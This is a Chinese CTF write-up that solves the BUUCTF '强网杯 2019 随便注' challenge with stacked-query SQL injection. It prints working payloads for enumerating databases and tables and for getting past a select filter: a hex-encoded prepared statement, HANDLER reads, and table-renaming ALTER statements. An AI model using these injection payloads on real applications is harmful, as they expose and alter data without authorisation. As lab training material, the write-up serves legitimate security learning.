BUUCTF WEB 强网杯 2019 随便注

1：题目

2：解题

2.1：尝试点提交

        url变为：http://b61f33a4-644b-402a-9da5-4bdf8043f954.node4.buuoj.cn/?inject=1 

        可知传入的参数名为 inject，参数为1。

2.2：尝试万能钥匙

        输入：1' or '1'='1';#      可得到所有数据，但没有flag。

 2.3：尝试联合查询

        输入：1' union select 1,2;#

         过滤了select、update、delete、drop、insert、where、点。

2.4：尝试查询数据库

        输入：1';show databases;#

得到数据库：ctftraining、information_schema、mysql、performance_schema、supersqli、test

2.5：尝试查询表

        输入：1';show tables;#

        得到表：1919810931114514、words。

2.6：尝试查询表1919810931114514的列

        输入：1';show columns from `1919810931114514`;#

         得到表1919810931114514的列为flag，可知flag在1919810931114514表中。

注：SQL语句中有两类特殊字符：关键字、保留字。

关键字：在Mysql中具有特殊含义，比如alter、static、cache。虽然具有特殊含义，但是还是可以作为Mysql中的标识符来使用的。例如你创建一个表名为static的表并没有什么问题，但不推荐这么做。

保留字：是Mysql自身保留的标识符，例如select、insert。这类字在Mysql中就比较强势了，一般情况下是不允许使用的，非要使用，则加反引号（键盘tab键上面，数字1左边的那个按键），`select` 即可作为表名了。

纯数字：纯数字作为表名和字段名也必须加反引号，如`1919810931114514`

（要尽量避免使用关键字、保留字、纯数字来作为表名和字段名）

2.7：尝试查询表words的列

        输入：1';show columns from words;#

         得到表words的列有：id、data，可知页面默认查询显示的为表words的内容，传入的inject参数为id值。

2.8：如何取得flag

2.8.1：方法一"16进制编码"

        思路：将 select * from `1919810931114514` 进行16进制编码，绕过过滤。

        输入： 

1';SET @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;PREPARE execsql FROM @a;EXECUTE execsql;#

        原理解释：

        2.8.1.1：十六进制编码绕过 select 过滤

        MYSQL可以识别十六进制并对其进行自动转换。

        select * from `1919810931114514`十六进制编码为：

        0x73656c656374202a2066726f6d20603139313938313039333131313435313460

        2.8.1.2：SQL语法之“用户变量”  

        用户变量：用户自己定义的变量，我们可以给用户变量分配值，并且可用在任何可以正常使用标量表达式的地方。用户变量可以作用于当前整个连接，但是当当前连接断开后，其所定义的用户变量都会消失。

        定义变量：@变量名

        变量赋值：SET @userName = (SELECT name FROM user WHERE id = 2);

                          SET @userName := (SELECT name FROM user WHERE id = 2);

                          SELECT @userName := (SELECT name FROM user WHERE id = 2);

        对于SET，可以使用=或:=来赋值，对于SELECT只能使用:=来赋值。

        因为SELECT语句中，等号会被看做是比较操作符。

        2.8.1.3：SQL语法之“预处理”

       SQL语句分两种：即时 SQL、预处理SQL

　　即时SQL：一次编译，单次运行

        一条 SQL 在数据库接收到后执行的流程为：词法和语义解析 -> 优化 SQL 语句，制定执行计划 -> 执行并返回结果。

       预处理 SQL：一次编译、多次运行。不会直接执行 SQL 语句，而是先将 SQL 语句编译，生成执行计划，然后通过 Execute 命令携带 SQL 参数执行 SQL 语句。

        绝大多数情况下，某一条 SQL 语句可能会被反复调用执行，或者每次执行的时候只有个别的值不同。如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等，则效率就明显不行了。所谓预编译语句就是将此类 SQL 语句中的值用占位符?替代，可以视为将 SQL 语句模板化或者说参数化，一般称这类语句叫Prepared Statements。 此外预编译语句能防止 SQL 注入。   

        定义：PREPARE statement_name FROM preparable_SQL_statement;

        执行：EXECUTE statement_name USING @var_name1 ,@var_name2 ...; 

        删除：DEALLOCATE/DROP PREPARE statement_name;

        注：DEALLOCATE、DROP都可以删除，每一次执行完EXECUTE时，养成好习惯，进行删除，释放执行中使用的所有数据库资源。

2.8.2：方法二"利用HANDLER语句"

        思路：MySQL 除了可以使用 select 查询表中的数据，也可使用 handler 语句查询数据。

        注入：1'; handler `1919810931114514` open; handler `1919810931114514` read first;#

        原理解释：        

        HANDLER语句使我们能够一行一行的浏览一个表中的数据，handler 语句并不具备 select 语句的所有功能，它是 MySQL 专用的语句，并没有包含到SQL标准中。

        语法：

        打开句柄：handler handler_table open;       

        查看数据：handler handler_table read first/next/prev/last;

        关闭句柄：handler handler_table close;

        具体参考：https://blog.csdn.net/qq_43427482/article/details/109898934

2.8.3：方法三"改表名"

        思路：因为页面默认查询显示的为表words的内容，可通过 rename 先把 words 表改名为其他的表名，再把 1919810931114514 表的名字改为 words ，给新 words 表添加新的列名 id ，id默认值为1，将 flag 改名为 data 。

        输入：1'; rename table words to word1; rename table `1919810931114514` to words; alter table words add id int(10) default 1; alter table words change flag data varchar(100); #

        这样再输入1，即可把flag值显示出来。

注 ：不建议使用这种方法，如果在改表words名成功，但后面的改1919810931114514表名、加id列出错的话，将会很麻烦。更改数据库可能导致无法解题。